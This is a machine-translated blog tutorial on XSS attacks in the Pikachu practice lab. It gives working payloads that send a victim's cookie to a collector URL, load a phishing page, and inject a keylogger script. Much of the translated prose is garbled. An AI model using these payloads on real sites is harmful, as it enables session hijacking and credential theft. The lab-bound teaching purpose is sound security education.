Digression:
Before you begin, please allow me to Tucao look, if you are eager to begin a new journey XSS, then please ignore.
Programmers are well known in the industry, most programmers are always lazy approach to life and work, they are rigorous enough but not detailed enough, clean and the word can only be done after a word, but in fact it can not serve as judge programmer standard, because the horizontal comparison, many programmers is not the case, longitudinal observation, the presence of personnel of these features are not uncommon in other areas, all in all, a set of common habits of the population is likely related to urban style as well as social style.
Written blog is very time-consuming, you need to figure out all the links, make the right operation, because science is rigorous, many experts touched upon Guan Qiao know your blog how much water (uh ... ... the programmer is limited to whether the water master professional skills, and copy text or not), plus the blog is not operating screenshots and referred to the pile, we need to write words, sentences and ensure fluent language in order to allow us to be able to find their own answers on the blog one day when a certain part of forgotten knowledge of the future.
But really did it, we really can do it, almost forgotten in time but also through the blog to find information without having to re-learn? For most programmers I do not count on it. Of course, under normal circumstances we will forget something, one can almost think of it. But think back, now you remember how many redox reactions, whether given organic molecule can write the formula works, electromagnetic relays, the Lorentz force, Lenz's law, as well as the derivative of a logarithmic function of the exponential function, 60 Bibei ancient poetry, then each of us versed in things, and now look at the law and the simple explanation, then you can solve the subject of it?
So bedding so much I want to say, even if it is for their own, if only to himself, the blog written statement fluent, do not try typos, good cut each picture, the operation described in the picture clearly written, his heart not to have that word, people should think, feel that others should understand that we should not be viewed in isolation of the world, there are a lot of people do not understand, if you want to omit, then we have the responsibility, the knowledge of the source marked to allow the reader to continue to learn, if you just for yourself, it is better to write a word document, since the use of this platform to give the corresponding convenience and rights, it should fulfill the corresponding obligation, which with the code level, operational capacity and other so it does not matter, it's just a sense of responsibility, convergence and exchange of knowledge, as well as the development of civilization and heritage are inseparable from this responsibility.
We may be high level (we only increase the sense of identity the way here, my level is not high), but the details are not clear, the sentence uncertain blog, just wasting valuable time learner computer, looking at successful operation the screenshots do nothing, if we are two decades later, one day, need to build an environment, his head empty, open the blog, watching helpless as to run a successful shot, that time has upset useless. Put yourself in it, we look at the blog, when others want unavoidably, why not ask for help place Motoki, Shu Shu at our own people?
All in all, please take seriously every blog post, good detail, hearts and a sense of responsibility to knock every word of it.
XSS background build:
For the next cookie experiments, we need to build XSS backstage to get the cookie value, the host of the two methods you can use to set different IP to experiment, can also be used to test only Pikachu, I have here is the latter, the fact that the only change an IP only, set XSS background of fact, in my previous blog already introduced: Pikachu: environmental installation and brute force.
First, we need to put the Pikachu-master (folder name of each person may be different, pay attention to the name, followed by useful) in the pkxss out, put down Pikachu with the same directory, that is, under the WWW directory:
In fact, you now follow the normal steps to open Firefox in pkxss, you will find it normal into the background, because you have successfully installed a back, now open the folder to modify the configuration file, change the fact that I did not do, because the question will need to modify the localhost , localhost here do not have to change, as the database name and password, I have not changed Mysql configuration, there is no need to change ah:
Now open pkxss page, there will be red to let you initial installation:
Click, we found problems, and failed to initialize.
Actually, the problem lies in the ip, many blog just let you modify one of the other addresses in the above config.inc.php file, the original is 192.168.1.1 or localhost, modified to 192.168.10.100, with your host IP, also there localhost are not the same, how likely to succeed.
This time to modify the host ip would be finished, click phpStudy, other options menu, click "Open host":
The selected a place you want to modify ip, I have here is 192.18.1.111, and then save:
Modify the host ip, right-click the bottom right corner of a small computer, click Open Network Connections, right-click and click Properties in the local connection, double-click to open the map in the options, if there are two, open the ipv4:
The ip address, subnet mask and gateway provided below, IP address, gateway and have the same network segment:
After setting and then click on the page in the red initial installation, Success appears:
Then "click here" to enter the home page, enter admin / 123456 Login:
Next redirection, in fact, the ip which is set to start new setting, making the jump page Fixed:
If a casual setting, for example, I set up here 192.168.1.110, you will jump error, specifically how to jump behind us say:
So here are also set to 192.168.1.111, pay attention to this URL! ! ! We know that careful analysis, in fact, is home to jump to Pikachu, Pikachu and the name of the folder if the error will not jump successfully, because there can not find this folder, which is above the brackets say I have a note the reason the name of the folder. For example, I have here a file folder name is pikachu-master, if the URL is http://192.168.1.111/ pikachu /index.php, it will jump fail because the folder name is not this, it should be correct URL Yes:
http://192.168.1.111/pikachu-master/index.php
You can modify according to their own situation.
A, Cookie (Get Type XSS ) with the use of stolen
We enter the reflective XSS (get), do something in the text box, but based on the experience already done, just let us know that a text input box 20 bytes, so let's change it, to increase the number of bytes, F12 call up the Web console:
Label to determine the degree of selection pages, I've already modified the byte length, followed by open XSS background, click on the cookie collection, appears page:
Js enter the following statement in the text box, page goto:
<script>document.location='http://192.168.1.111/pkxss/xcookie/cookie.php?cookie=' +document.cookie;</script>
Look XSS background, which had a record, because here in front of me logged every time return to the page or jump back operation XSS will capture a cookie, so id is 4, can be ignored, and here I only release this one, we also got cookie
PHPSESSID = 31dea1b72e9ea745f126a5267b86da34
Where referer, once the user access this link, it will jump to the home side, but the way we have been to get the cookie value:
http://192.168.1.111/pikachu-master/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F192.168.1.111%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2Bdocument.cookie%3B%3C%2Fscript%3E&submit=submit
post type xss cookie value acquisition
log in:
We enter the <script> alert ( 'xss') </ script>, loopholes, and found no change in the address bar, not the URL displayed:
View pkxss-xcookie-post.html file
We need to take ourselves a malicious site, then put a link to a post form will be stored POST form is sent to the victims on the site, click on the induction of victims POST form will automatically submit a POST request to the server vulnerabilities, to help us realize victim submitted POST request object
First, modify the malicious site server address: XSS vulnerability exists above address, the following is submitted cookie background address.
The role of the malicious page is: When a user accesses the page, it will automatically send a POST request to the server vulnerabilities, and then redirected to the server's vulnerability index page
If a user visits the page jump deception, you will get a cookie value in pxss
Two, XSS fishing demo
IP modified into the folder (specific path below):
There xfish and fish folder, we enter fish.php shown in the following figure to select, modify ip:
Next we look at the contents xfish analyze code and found to give certification box, enter the user name, password, redirect to the background, the same background have the same interface, the way to get get a user name and password with storage
An attacker looks normal to the user can not deceive trusted page, and this page is embedded in some of the attacker's malicious code to steal some information users. When the user points to open this page, see page are normal, in fact, so is the login information to an attacker gains in the background page.
The following two code can lead to XSS vulnerabilities:
<img src=" http://192.168.1.111/pkxss/xfish/fish.php"/>
<script src=" http://192.168.1.111/pkxss/xfish/fish.php"> </script>
In which you enter admin / 123456, background check records found XSS, and refresh will add a new record, because the back end is already stored information (I am here is to get the result and then refresh twice):
Three, XSS get keyloggers
Cross-domain:
Before you begin we need to understand cross-domain, by definition, is a cross-domain across the field, of course, this operation is not permitted, if the website is a key to let us into individual pages, each page can only course with a key or by a key, the key to someone's home can not be allowed to open the door of your home, after all, side couch How can we allow others snoring sleep. According to this principle, you go to page 360 of the execution of the script page by Baidu, of course, we can not allow you to do things here.
Crown Point academic point of view, is that the page must be homologous, not our family who do not Officer in our house, referring to the browser can not execute scripts other sites. It is a browser- origin policy caused a browser security restrictions imposed.
The so-called homologous refers to the domain, protocol, port are the same ,
Do not understand it does not matter, give chestnuts:
http://www.123.com/index.html call http://www.123.com/server.php (non-cross-domain)
http://www.123.com/index.html call http://www.456.com/server.php (different main domain: 123/456, cross-domain)
http://abc.123.com/index.html call http://def.123.com/server.php (subdomain different: abc / def, cross-domain)
Call http://www.123.com:8081/server.php (different ports: 8080/8081, cross-domain) http://www.123.com:8080/index.html
http://www.123.com/index.html call https://www.123.com/server.php (different protocols: http / https, cross-domain)
Please note: localhost 127.0.0.1 and although point to the machine, but also a cross-domain.
(Homologous with regard to interpretation, and some allow cross-domain method, the original can refer to this link:
https://blog.csdn.net/lambert310/article/details/51683775)
So we have to see if there is cross-domain restrictions, open rkserver.php (path as shown below):
After the plug-in open-labeled portions, the writer has been allowed to set up cross-domain access:
Then we can use the tag to operate the keyboard get recorded, the following labels allow cross-domain operation, Pikachu: brute sector we have seen them up:
<Script src = "..."> // js, loaded into local execution
<Img src = "..."> // Pictures
<link href=”…”>//css
<Iframe src = "..."> // any resource
Let us analyze this folder under the code of other files, open only js file, we take a look at the js files into the page being among the attackers, the keyboard value by acquiring, post sent to the attacker's ip background:
最后一个文件夹就是记录键盘结果,没有什么特别的:
之后在存在存储型XSS的网站插入代码,这里用了script标签,其他标签当然也可以,这里只是搞个示例:
<script src= "http://192.168.1.111/pkxss/rkeypress/rk.js"></script>
在键盘上随便输入发现会跳出来 页面请求失败,在pkxss后台我们就可以看到获取的信息。